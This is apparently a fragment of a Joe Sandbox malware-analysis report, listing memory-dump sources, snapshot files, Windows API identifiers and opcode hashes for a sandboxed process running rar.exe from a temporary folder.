                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
                                                                                                                                                                                                                              • API String ID: 3307058713-2598598277
                                                                                                                                                                                                                              • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction ID: 4b4c5bb34c79d31ded7865f6ca9fe90be10939c1227a250d5085852686a48180
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD41BE36A58A4285EF34DF259C601B877A5EB44F84B558035ED0E87B85DF3DEC81C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                              • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction ID: 09c7cb6da1627759c20a644396a0e1d6c0b3c18a9ac2de2fcd005a76af0562f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39217322A5878241EF748F259CB01392655EB45F74F289339DA6E87BD8DF38EC81C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                                              • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction ID: b1dfcc22c02227afffa81ce3bf8da36eb32b70254455ef6e11a1eb71ae0c32b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6116A31A08A4282EF25DF15EC411BA7371FB84F84F548036EA9E82679DF3CE946D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3094578987-0
                                                                                                                                                                                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction ID: 38b6c4e1407cf40713a6a7dc2a0411577914552afbd9af3e5e525d08deb7dc34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F01226A08A4682DE709F21FD4407D6361FF89F99F144131DE9E86A79CE2CD9458B11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction ID: 9ad633262f62fb0b34ecdf0333d7a5dab33b92bef6f75d62d3c5959396b1551c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BE01A20A9870542EF64AF219C917792352AFA4F41F009438CC0EC2797CE3DEC088662
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4141822043-0
                                                                                                                                                                                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction ID: c6a8ae9a96e4393ecd71ad092b67b528ca15f5b01819f741889c81ea64f4a0ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCE08C20E0460242EE688F21AC691380251AF49F81F401038D80FCABA6EE2C98858321
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                              • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                              • Instruction ID: d45f1a4b3e66be67713a1bd09338efeeff5abbf9433fe32c443def061d2e805f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EE1E422A1968281EF349F25DC001BD67A0FB51B94F644631DB9D87AE9DFBCEC81D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6256C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6256C7C48), ref: 00007FF6256D1B8D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6256C7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6256C7C48), ref: 00007FF6256D1BD7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction ID: 2bb8e1690a3dd4f4b97120a290af16e86375f13144b31ebbec1263c5357c2e24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC313763A1964546FB308F20D8053B926A0FB94F78F204334DE6C866D5EFBCCD859741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction ID: f58ee96e35c5c66aab37b5a142350b4886bcdef1729dbdce13c742b1dc700032
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA218463D18F8582EB119F29D5510B86360FB98F88B18A331EF4D53666EF38E5E58300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d0362efd7841f33a64a4297c863bcf5aa041ed09a150819475a5a8936ca3c004
                                                                                                                                                                                                                              • Instruction ID: b00137ac31550916b4afecda43180040c01fd99868cb4b352546e47cc057cf07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0362efd7841f33a64a4297c863bcf5aa041ed09a150819475a5a8936ca3c004
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11813190AB8282EE60EF54AD043A962E4FF84B94F244635E69D877E6DE7CD8519301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction ID: b601284fe4868541c0c4f4d726a076a0eeca8fbcd72defa2c1cf604c96aec184
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D018231A1A69182EE748F26AD0057D6261BF54FA0F249A30DB6DC3FE4CE3CE8419701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6256C7A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF625712AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625717EF3
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6256C7A8F
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256C7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256C7B44: GetFileType.KERNELBASE(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B56
                                                                                                                                                                                                                                • Part of subcall function 00007FF6256C7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6256C7A9E), ref: 00007FF6256C7B69
                                                                                                                                                                                                                                • Part of subcall function 00007FF625712ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625712AD0
                                                                                                                                                                                                                                • Part of subcall function 00007FF625712B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF625712C1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
